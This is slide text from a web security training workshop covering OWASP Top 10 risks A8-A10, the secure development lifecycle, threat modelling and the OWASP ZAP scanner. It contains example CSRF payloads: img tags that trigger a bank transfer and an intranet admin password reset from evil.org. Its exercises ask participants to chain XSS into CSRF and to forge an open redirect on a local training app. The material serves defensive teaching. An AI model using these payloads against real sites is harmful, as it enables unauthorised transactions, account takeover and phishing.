https://twitter.com/bkimminichhttps://linkedin.com/in/bkimminichhttps://google.com/+BjörnKimminichhttp://slideshare.net/BjrnKimminich
Agenda Day Two
Top 10 Web Application Security Risks (A8-A10)
Secure Software Development Lifecycle
OWASP Zed Attack Proxy
Quiz & Wrap-Up
A8: Cross-Site Request Forgery (CSRF)
Attack Vector
Average
Prevalence
Common
Detectability
Easy
Impact
Moderate
Cross-Site Request Forgery (CSRF)
An attack where the victim’s browser is tricked into issuing a command to a vulnerable web applicationVulnerability is caused by browsers automatically including user authentication data with each request
Session CookieBasic Authentication HeaderIP AddressClient Side SSL CertificatesWindows domain credentials
Typical ImpactInitiate transactions
transfer funds, logout user, close account, …
Access sensitive dataChange account details
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
CSRF Vulnerability Pattern
Web Browsers include most credentials with each request…
…even for requests caused by a form, script or image on another site!
All sites relying solely on automatic credentials are vulnerable!Sites with XSS vulnerabilities can be abused for attacking sites with CSRF vulnerabilities
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
CSRF Attack Explained
bank.com
WebApp
Browser
Bug!
evil.org
WebApp
Login
100
0$
Request
GET / HTTP/1.1Host: www.evil.org
Response
HTTP/1.1 200 OK...<html>...<img src=“http://bank.com/transfer
?to=hacker&amount=1000$“/>...</html>
CSRF-Attack
GET/transfer?to=hacker&amount=1000$ HTTP/1.1Host: bank.com
Intranet
Firewall
CSRF Attack into Intranet
192.168.0.1
WebApp
Browser
Bug!
evil.org
WebApp
Login
Rem
ote
Acc
ess
Request
GET / HTTP/1.1Host: www.evil.org
Response
HTTP/1.1 200 OK...<html>...<img src=“http://192.168.0.1/admin?setAccessMode=remote&resetPassword“/>...</html>
CSRF-Attack
GET/admin/setAccessMode=remote&resetPassword HTTP/1.1Host: 192.168.0.1
Protection
Add a secret, not automatically submitted, token to all sensitive requests
This makes it impossible for the attacker to spoof the request (unless there is an XSS hole in your application)Tokens should be cryptographically strong or random
OptionsStore a single token in the session and add it to all forms and links (e.g. Hidden Field, Single Use URL, Form Token)Beware exposing the token in a referer headerCan use a unique token for each function (e.g. hash of function name, session id, and a secretCan require secondary authentication for sensitive functions (e.g. eTrade)
Make sure your application has no XSS holes which could be exploited to attack other applications (or itself)Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
CSRF + XSS =
What shenanigans might our troll friend have in mind with any unwelcome forum posts he encounters?
[img]http://forum.com/logout.do[/img]
Exercise
Browse to http://localhost:3000
Task 1: Craft an CSRF attack by using an existing XSS holeTask 2: Trick user Bender into changing his password to slurmCl4ssic
A9: Using Known Vulnerable ComponentsAttack Vector
Average
Prevalence
Widespread
Detectability
Difficult
Impact
Moderate
Exercise: Name the Vulnerability!
Heartbleed
OpenSSL1.0.1 – 1.0.1f
How Heartbleed works (I)
Source: http://xkcd.com/1354/
How Heartbleed works (II)
Source: http://xkcd.com/1354/
How Heartbleed works (III)
Source: http://xkcd.com/1354/
Using Known Vulnerable Components
Libraries often contain vulnerabilitiesAttacker identifies a weak component
through scanningor manual analysis
Customized exploits used to execute attackFull range of weaknesses is possible
injection, broken access control, XSS, etc.Impact could be minimal, up to complete host takeover and data compromise
Source: https://www.owasp.org/index.php/Top_10_2013-A9
Prominent Library Vulnerabilities
Source: https://www.aspectsecurity.com/uploads/downloads/2012/03/Aspect-Security-The-Unfortunate-Reality-of-Insecure-Libraries.pdf
SpEL Injection
Authentication Bypass
Remote Code Execution
Exercise
Browse to http://localhost:3000
Task: Inform the shop about a vulnerable library they are using
Use the 'Contact Us' page and supplythe exact library namethe exact version
within your comment.
Protection
Identify the components and their versions you are using, including all dependenciesMonitor the security of these components in public databases, project mailing lists, and security mailing lists, and keep them up-to-dateRestrict the use of unapproved components
Source: https://www.owasp.org/index.php/Top_10_2013-A9
A10: Unvalidated Redirects and Forwards
Attack Vector
Average
Prevalence
Uncommon
Detectability
Easy
Impact
Moderate
Unvalidated Redirects and Forwards
Web application redirects are very commonAnd frequently include user supplied parameters in the destination URLIf they aren’t validated, attacker can send victim to a site of their choice
Forwards are common tooThey internally send the request to a new page in the same applicationSometimes parameters define the target pageIf not validated, attacker may be able to use unvalidated forward to bypass authentication or authorization checks
Typical ImpactRedirect victim to phishing or malware siteAttacker’s request is forwarded past security checks, allowing unauthorized function or data accessSource: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
Unvalidated Redirect Explained
bank.com
WebAppBrowser
Bug!
evil.org
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
Victim Request
HTTP/1.1 302 FoundLocation: http://www.evil.org
Redirect R
esponse
Request to Redirect URL
https://bank.com/account?...&...&...&dest=www.evil.org&...&...&...&...
URL
Exercise
Browse to http://localhost:3000
Task: Find a place where a redirect is doneForge a link redirecting to http://kimminich.de
Do not let any validations stop you!
Protection
Avoid using redirects and forwards as much as you canDon’t involve user parameters in defining the target URLIf you ‘must’ involve user parameters, then either
Use server side mapping to translate choice provided to user with actual target page Validate each parameter to ensure its valid and authorized for the current user
Use a secure Redirect APIe.g. ESAPI SecurityWrapperResponse.sendRedirect(URL)
Some thoughts about protecting ForwardsCall the access controller to make sure the user is authorized before you perform the forwardNext best is to make sure that users who can access the original page are authorized to access the target page
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
Secure SDLC
Secure Software Development Lifecycle
Secure Software Development Lifecycle I
Analysis / Functional DesignIdentify (better: Reject) potentially insecure requirements
Technical DesignConsider Security Aspects when designing a solutionCreate a Threat Model of your Applications
Secure Software Development Lifecycle II
Development / RealizationKnow and understand common vulnerabilitiesKnow preventive measures for each vulnerabilityWrite Clean Code (=less likely to contain a flaw)
Write Unit Tests (=less likely to miss an existing flaw)
Perform Security Scans on source code levelPerform Code Reviews
Most importantly…Never blindly trust any user input!
Secure Software Development Lifecycle III
TestPerform Penetration Tests for new functionalityHave a 3rd party perform regular PentestsSupport Pentests with Security Scanners
Operations / MaintenanceInstall a Web Application FirewallEstablish an Incident Response Process
OWASP Open SAMM
Open Software Assurance Maturity Model
Open Software Assurance Maturity Model
Maturity Levels for each Security Practice0 = Unfulfilled activities1 = Initial understanding and ad hoc provision2 = Increased efficiency/effectvieness3 = Comprehensive mastery
Source: www.opensamm.org/downloads/SAMM-1.0.pdf
Security Practice Description & Assessment (Example)
Source: www.opensamm.org/downloads/SAMM-1.0.pdf
Open SAMM Online Self-Test
https://ssa.asteriskinfosec.com.au/
Threat Modelling
Bringing Security into Software Design
Threat Modelling (by Microsoft)
Repeatable Process to find all and address all threats to you application
Allows you to predicably and effectively find security problems early in the development processHelp to produce software that is secure by design
Source: http://download.microsoft.com/download/9/3/5/935520EC-D9E2-413E-BEA7-0B865A79B18C/Introduction_to_Threat_Modeling.ppsx
Diagram
Identify Threats
Mitigate
Validate
Diagramming
Go to the White BoardUse Data Flow Diagrams
Include Processes, Data Stores, Data FlowsInclude Trust Boundaries
= Points/Surfaces where an attacker can interject
Diagram LevelsHigh Level ScenarioLow Level SubcomponentsMore Details if needed
Source: http://download.microsoft.com/download/9/3/5/935520EC-D9E2-413E-BEA7-0B865A79B18C/Introduction_to_Threat_Modeling.ppsx
Diagram
Identify Threats
Mitigate
Validate
Diagram Elements I
External EntityThe external entity shape is used to represent any entity outside the application that interacts with the application via an entry point.
ProcessThe process shape represents a task that handles data within the application. The task may process the data or perform an action based on the data.
Source: https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf
Diagram Elements II
Multiple ProcessThe multiple process shape is used to present a collection of subprocesses. The multiple process can be broken down into its subprocesses in another DFD.
Data StoreThe data store shape is used to represent locations where data is stored. Data stores do not modify the data they only store data.
Source: https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf
Diagram Elements III
Data FlowThe data flow shape represents data movement within the application. The direction of the data movement is represented by the arrow.
Privilege BoundaryThe privilege boundary shape is used to represent the change of privilege levels as the data flows through the application.
Source: https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf
Example Diagram
Source: https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf
Identifying Threats
Use STRIDE to step through the diagram elements
SpoofingTamperingRepudiationInformation DisclosureDenial of ServiceElevation of Privilege
Source: http://download.microsoft.com/download/9/3/5/935520EC-D9E2-413E-BEA7-0B865A79B18C/Introduction_to_Threat_Modeling.ppsx
Diagram
Identify Threats
Mitigate
Validate
STRIDE Threat List
Source: https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf
Different Threats affect each Element Type
Source: https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf
Mitigation
The Point of Threat Modelling
Address or alleviate ProblemsProtect CustomersDesign Secure Software
Addressing ThreatsRedesign to EliminateApply Standard MitigationsInvent new Mitigations (Avoid!)Access Vulnerability in Design
Source: http://download.microsoft.com/download/9/3/5/935520EC-D9E2-413E-BEA7-0B865A79B18C/Introduction_to_Threat_Modeling.ppsx
Diagram
Identify Threats
Mitigate
Validate
Validation
Validate whole Threat Model
Diagram matches final Code?At least STRIDE exists per Element that touches a Trust Boundary?Is each Threat mitigated?Are Mitigations done right?Source: http://download.microsoft.com/download/9/3/5/935520EC-D9E2-413E-BEA7-0B865A79B18C/Introduction_to_Threat_Modeling.ppsx
Diagram
Identify Threats
Mitigate
Validate
Security Libraries and Tools
(Do not expect a Silver Bullet here!)
OWASP ESAPI
Custom Enterprise Web Application
OWASP Enterprise Security API
Au
the
nti
cat
or
Use
r
Acces
sC
on
tro
ller
Access
Refe
ren
ceM
ap
Valid
ato
r
En
cod
er
HT
TP
Uti
liti
es
En
cry
pto
r
En
cry
pte
dP
rop
ert
ies
Ran
do
miz
er
Excep
tion
H
an
dlin
g
Log
ger
Intr
us
ion
De
tecto
r
Secu
rit
yC
on
fig
ura
tion
Your Existing Enterprise Services or Libraries
Apache Shiro
Powerful and easy-to-use Java security framework that performs
authenticationauthorizationcryptographysession management
Network Security = Useless?!
ServerNetwork Security
Firewall IDS IPS WebApp
Malicious Requestsexploit vulnerabilities
andcompromise application
Security Scanners
ServerNetwork Security
Firewall IDS IPS WebApp
BlackboxScannerPenetration Test
WhiteboxScanner
Web AppSourcecode
CodeAnalysis
Fix + PatchApplication
New security holes mightbe introduced duringongoing developmentand bugfixing!
Vulnerabilities mightbe insufficiently fixed
Web Application Firewall (WAF)
ServerNetwork Security
Firewall IDS IPS WebApp
WAF
GuidelinesRuleset
WhitelistBlacklist
Heuristics
Defines legal/illegal Requests
Rejects illegalrequests
Sometimes rejects legitimate requests („False Positives“) or fails to recognizeillegal requests („False Negative“)
Information Security Incident Response Process
Event
Detection
Reporting
InformationCollection
FirstAssessment
Relevant?
SecondAssessment
Relevant?
False Positive
Incidentunder
control?
Fore
nsic A
naly
sis
Com
munica
tions
Late
rR
esp
onse
Activate CrisisTeam
Crisis A
ctivitie
s
Imm
edia
te R
esp
onse
Review
Improve
DetectionReporting
User/Source
Yes
No
AssessmentDescision
OperationsSupport
No
Yes
No
Yes
Response
Information SecurityIncident Response Team
Crisis Organization
No
Yes
OWASP Zed Attack Proxy
An Open Source Blackbox Security Scanner
Zed Attack Proxy (ZAP)
An easy to use webapp pentest toolCompletely free and open sourceAn OWASP flagship projectIdeal for beginners……but also used by professionalsIdeal for automated security testsBecoming a framework for advanced testing
Source: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
Principles
No paid for „Pro“ versionInvolvement actively encouragedCross platform (Java)Easy to useEasy to installFully documentedWork well with other toolsReuse well regarded components
Source: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
Statistics
First released September 2010Current version 2.3.1
released in May 2014downloaded 70.000+ times
Translated into 20+ languagesIntended for Developers……mostly used by Professional Pentesters
Source: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
Features
Intercepting ProxyActive and Passive ScannersSpiders (for HTML and AJAX)
Report GenerationBrute Force (using OWASP DirBuster code)
Fuzzing (using fuzzdb & OWASP JBroFuzz)
WebSocket SupportSession AwarenessIntegrated Addon-MarketplaceAPI (clients exist for Java, Python, Node.js, PHP)
Scripting (JS, Jython, JRuby, Zest)Source: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
Usage Scenarios
Source: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
Quiz & Wrap-Up
Quiz
A1: Injection
A3: Cross-Site Scripting
(XSS)
A2: Broken Authentication
and Session Management
A4: Insecure Direct Object References
A8: Cross Site Request Forgery (CSRF)
A5: Security Misconfigur
ation
A6: Sensitive Data
Exposure
A7: Missing Function Level Action Control
A9: Using Known
Vulnerable Components
A10: Unvalidated
Redirects and Forwards
Ex-A6/2007: Information Leakage and
Improper Error Handling
Recommended Books
Security Live CDs/DVDs
Kali Linux (fka Backtrack)Samurai Web Testing FrameworkOWASP Broken Web Apps VM
Useful OWASP Links
OWASP Website http://owasp.org
Appsec Tutorial Series http://www.youtube.com/user/AppsecTutorialSeries
ZAP http://code.google.com/p/zaproxy
Java HTML Sanitizer https://code.google.com/p/owasp-java-html-sanitizer/
Enterprise Security API http://code.google.com/p/owasp-esapi-java/
OpenSAMM http://www.opensamm.org/
Broken Web Applications https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project
Vulnerable Web Applications Directory https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project
End of Day Two
Participant Feedback
Follow the Doodle link in your invitation email
Please provide at least a star-ratingAdditional feedback is highly appreciated
What did you like best about the workshop?What could have been better?What didn‘t you like at all?
End of Workshop
Thank you for your attention!
The Background Artwork: Shodan
The background artwork shows the self-image of villain AI Shodan from the cyberpunk-RPG video games System Shock and System Shock 2
©1994/1999 Looking Glass Studios/Irrational Games
Background image based on „Digital Shodan“ created by sephiroth-kmfdm
Source: http://sephiroth-kmfdm.deviantart.com/art/Digital-Shodan-56013493
Recolorized using Corel PSP X5, Paint.Net and IrfanView